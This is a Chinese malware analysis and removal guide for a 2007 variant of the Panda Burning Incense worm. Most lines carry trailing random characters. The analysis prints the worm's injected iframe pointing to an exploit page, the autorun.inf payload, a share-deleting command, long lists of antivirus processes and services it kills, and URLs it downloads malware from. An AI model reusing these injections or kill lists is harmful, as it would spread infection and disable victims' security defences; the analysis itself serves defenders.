熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe o=m5AUe?J  
'n &p5%  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） uzd7v,  
QiPqN$n  
中文名称：（尼姆亚，熊猫烧香） .n 9.y8C  
P3oYk_oW  
病毒大小：68,570 字节 PQHztS"  
GkAd"<B  
编写语言：Borland Delphi 6.0 - 7.0
jD S?p)&  
o|xf2k  
加壳方式：FSG 2.0 -> bart/xt k[Em~>m  
CmU@8-1  
发现时间：2007.1.16 K9<8FSn  
oC&}lp)q
 
危害等级：高 m<gdyY  
*p{p.%Qs:  
一、病毒描述： 49qa  
l)u%`Hcn  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 dwA"QVp{  
zEQ]5>mG  
二：中毒现象： ^twyy9VR  
9ihg[k  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 HhbBt'fH  
UylIxd  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 ZU\$x<,  
_H| )g*]t  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 !r/i<~'Bx  
[@K'}\U^+  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> Y>$5j}K  
<&eJIz=  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 ~kc#
"^sJ  
!'$*Z(  
6：不能正常使用任务管理器，SREng.exe等工具。 =ejcP&-V/  
H I9/  
7：无故的向外发包，连接局域网中其他机器。 cW3'057  
XpAJP++  
三：技术分析 |!oC7!+0^  
l$u52e!7  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe MW
wqon|  
B>u`%Ry&  
建立注册表自启动项: -@AhJY.  
3W'fEh5  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] r/h\>s+N  
>MYxj}I4{z  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 7w73,r/D8A  
$1=7^v[U  
2：查找反病毒窗体病毒结束相关进程: 9/"&6,  
dv. 77q  
天网防火墙 =eA|gt  
`0upm%A  
virusscan b^R:q7ea  
Q<>u)%92@  
symantec antivirus 'DW|a  
ivo3pibk%  
system safety monitor $HwF:L)*  
d.}65{F,x  
system repair engineer .{gDw  
jTwSyW  
wrapped gift killer \J:+Wl.9A  
@<K<"`~H  
游戏木马检测大师 Bo:epus
}\  
j+!u=E  
超级巡警 T4x%3-4;  
O+!4KNN.-  
3：结束以下进程: 05F/&+V  
!>(uhuTBF  
mcshield.exe >V.?XZ nt  
%)i&|AV"  
vstskmgr.exe a;$V;3C{b&  
^Zl[#:EFP  
naprdmgr.exe E+y_te^+b  
Qi\]='C  
updaterui.exe +1#;s!e  
<xBL/e %  
tbmon.exe h.-L_!1B7  
) `{jPK*`  
scan32.exe G;gsDn1t  
)EMlGM'2q  
ravmond.exe 4+8)0;<H  
l&\y]ZV={  
ccenter.exe IV~)BW leT  
e=XP4h  
ravtask.exe W. d',4)  
B\D)21Ik}%  
rav.exe Z7wl~Hk  
)4fQ~)  
ravmon.exe ](I||JJa9f  
8Z}%,G*n  
ravmond.exe g)f& mQ)  
dLqBu~*  
ravstub.exe +M.BMS2A<l  
L%[>z'Zp  
kvxp.kxp RH,x);
J|  
~!ei]UP  
kvmonxp.kxp 1.%|Er 4  
m p_7$#{l  
kvcenter.kxp lDBAei3iB  
'Rnzu0<lF  
kvsrvxp.exe o5/BE`VD5c  
(e_<~+E  
kregex.exe = y^5PjN  
3LyNi$`f  
uihost.exe Z|KDi `S  
XFTqt]
 
trojdie.kxp DhxS@/  
xi"ff.  
frogagent.exe NPv.7,  
{KDN|o+%  
kvxp.kxp I[rR-4.F]  
/7#MJH5b6  
kvmonxp.kxp ^EN )}:%Z  
N, u]2,E  
kvcenter.kxp z3[J sE%  
7Wv.-LD6  
kvsrvxp.exe ?!m\|'s-  
%J'/cmR&  
kregex.exe qu#xc0?  
>r X$E<B\  
uihost.exe h#Rza-?"\  
.[eC w  
trojdie.kxp S/*\j7cj  
bGB$a0  
frogagent.exe XXm7rn  
C ]B P}MY<  
logo1_.exe ^?]-Q*w3Qs  
7L:Eg  
logo_1.exe QiA}0q3]0  
5'DY)s-K  
rundl132.exe Uufig)6  
2\&3x}@  
taskmgr.exe D9;pjY  
PI$i_3N  
msconfig.exe QSzht$8  
h$sOJs~6h  
regedit.exe 2oc18#iG(  
)sQ/$gJ  
sreng.exe Nk7=[y#z  
4：禁用下列服务: z80(+`   
I%:?f{\  
schedule zC:Pg4=w]  
|_g7k2oLY  
sharedaccess DC_uh  
&'zc2  
rsccenter rS!@AgPLE  
J9;fqQCt  
rsravmon y4@gw.pt  
|Wa.W0A  
rsccenter 'aV'Am+:  
bxwwYSS  
kvwsc K:XP;#OsP  
xR$T/]/  
kvsrvxp %=*|:v
 
8kcMgCO  
kvwsc OqRRf  
wA7\K~fHV  
kvsrvxp +-),E.  
Ad,n+%"e  
kavsvc _UZPQ[  
F#L1~\7  
avp o(DG 3qk  
,)dlL tUm  
avp :_xfi9L~W0  
x%k@&d;z  
kavsvc NNr6~m)3v  
+w.$"dF!  
mcafeeframework n8)&1 q?V  
CV=qcD  
mcshield "l-#v| 54  
L58#ri=  
mctaskmanager /;}%E  
|.m)UFV  
mcafeeframework h*40jZ  
v,*C>u\3s  
mcshield SWhzcqp  
M:oM(K+  
mctaskmanager ~Gh7i>n*  
e T;@pc  
navapsvc uh.;Jj;  
__7}4mA  
wscsvc f@J
rbg  
sG_/E-%5'  
kpfwsvc G!B:>P|\l  
k{vbi-^6rf  
sndsrvc 2ry@<88  
:Cx|(+T  
ccproxy KiI+ V;
o  
J;^PM:6  
ccevtmgr +ansN~3  
z k}AGw  
ccsetmgr uY>M3h#qx  
w1-P6cf  
spbbcsvc N>*+Wg$Ne  
u_+iH$zA
 
symantec core lc &)+H''J
Y  
_4)z:?G5  
npfmntor %1jcY0zEQ  
|LbAW/9a  
mskservice <B0f  
JrY*K|YdW  
firesvc rq!
*unJ  
NZ i3U  
5：删除下列注册表项: $Z;/Sh  
2IM31 .  
software\microsoft\windows\currentversion\run\ravtask :8oJG8WH  
%c\kLSe  
software\microsoft\windows\currentversion\run\kvmonxp w$9LcN  
of_y<dd[G  
software\microsoft\windows\currentversion\run\kav I-g/)2  
0mUVa=)D  
software\microsoft\windows\currentversion\run\kavpersonal50 =c*l!."0  
_9 '_w&  
software\microsoft\windows\currentversion\run\mcafeeupdaterui TbNH{w|p  
#6ePwd  
software\microsoft\windows\currentversion\run\network associates error reporting service ^5
Lk}<utw  
 `ROHB@-  
software\microsoft\windows\currentversion\run\shstatexe I-r+1gty  
EmcLW74  
software\microsoft\windows\currentversion\run\ylive.exe :zKMw=  
rqmb<# Z  
software\microsoft\windows\currentversion\run\yassistse r)}U 'iv*%  
X)~wB7_0G  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） 'n
,V*9  
uz{RV_IX7  
7：跳过下列目录: cXqYO|3/M  
5a_8`csu  
windows >god++,o  
W +ER'lX  
winnt $+7uB-KsU  
/o m++DxV  
systemvolumeinformation [C0v-  
\*e\MOp6  
recycled xH*X5?  
?BfE*I$\h  
windowsnt c'eZ-\d{  
sNo8o1Hby  
windowsupdate jO&*E'pk  
v}Ju2}IK  
windowsmediaplayer z.SC^/\o|  
"hf |7E_  
outlookexpress w(6n  
*|dr-e_j  
netmeeting %?PFe}
 
&R%'s1]o  
commonfiles I
!S Eb  
?PT>V,&  
complusapplications MqAi}z%  
'q)g,2B%  
commonfiles ~.%HZzR6&  
m<-ShRr*b  
messenger =,(TP  
~x9]?T  
installshieldinstallationinformation a9.yuSzL  
?FAI@
4  
msn erUYR"  
\uJRjw+  
microsoftfrontpage kJ_8|  
rKrHd  
moviemaker PVo7Sy!'H  
K@O^\  
msngaminzone =+!l8o&o,  
Tf86CH=)5  
8：删除*.gho备份文件. W}CM;~*L  
;2<5^hgk  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. IA@>'O  
tR|dnC4U  
autorun.inf内容： Ku75YFO,5  
/D&&7;jJ  
程序代码 sCFxn  
r0XEB,}  
[AutoRun] =:^aBN#  
\_ 3>v5k|  
OPEN=setup.exe @&ZQDi  
Dw%'u'HG  
shellexecute=setup.exe by/H:
5}7  
 yfZNL?2x  
shell\Auto\command=setup.exe Cq\XLh `  
x=oV!x  
10：删除共享：cmd.exe /c net share admin$ /del /y G.rz6o;  
^viabkf C  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 &J>e;X  
?RsrY4P  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。
zw>L0gC  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 LjI`$r.B  
\Oeo"|  
目前下载列表如下： QrYF Lh  
Wo1xZZ  
http://www.krvkr.com/down/cq.exe M^o_='\bE  
f+h\RE=BGt  
http://www.krvkr.com/down/mh.exe ).SJ*Re*^I  
.<"XE7  
http://www.krvkr.com/down/my.exe Dr3_MWJ+  
ZZY#.  
http://www.krvkr.com/down/wl.exe +OE!Uqnt  
lP F326e  
http://www.krvkr.com/down/rx.exe =-h^j  
[.gk{> #  
http://www.krvkr.com/down/wow.exe XQ#K1Z  
D=0YLQ*rP  
http://www.krvkr.com/down/zt.exe srGOIK.  
?=? _
32O  
http://www.krvkr.com/down/wm.exe  `q?3u
x  
t6
DSZ^Zq  
http://www.krvkr.com/down/dj.exe qoO`)<  
3p%e_?  
http://www.krvkr.com/cn/iechajian.exe ZL( j5E  
oac)na:O#  
到此病毒行为分析完毕。 Jo5Bmh0  
0:$}~T9T  
四：Sec120.Com专家解决方案： tT}b_r7h(1  
:os8"  
1：关闭网络共享，断开网络。 B9maz"lJ  
~g{j)"1  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） ;c!> =  
bA^uzE  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 a:BW*Hy{\  
Z`Y&cKsn  
4：删除注册表启动项 A)f-r  
d:%b  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] 2n<Mu Q]  
1'~Xn 4 f  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" $*#a;w7\C  
a-{|/ n%  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe d^C@5Pd <  
U,Z\
)+-R  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 -DI >O/  
Xw?DN*`L  
7：如果电脑上有脚本文件，将病毒代码全部删除。 ]o6ZZK  
W$4$%r8  
8：关闭系统的自动播放功能。 $ev+0m_  
scg&"s  
这样就基本上将病毒清除了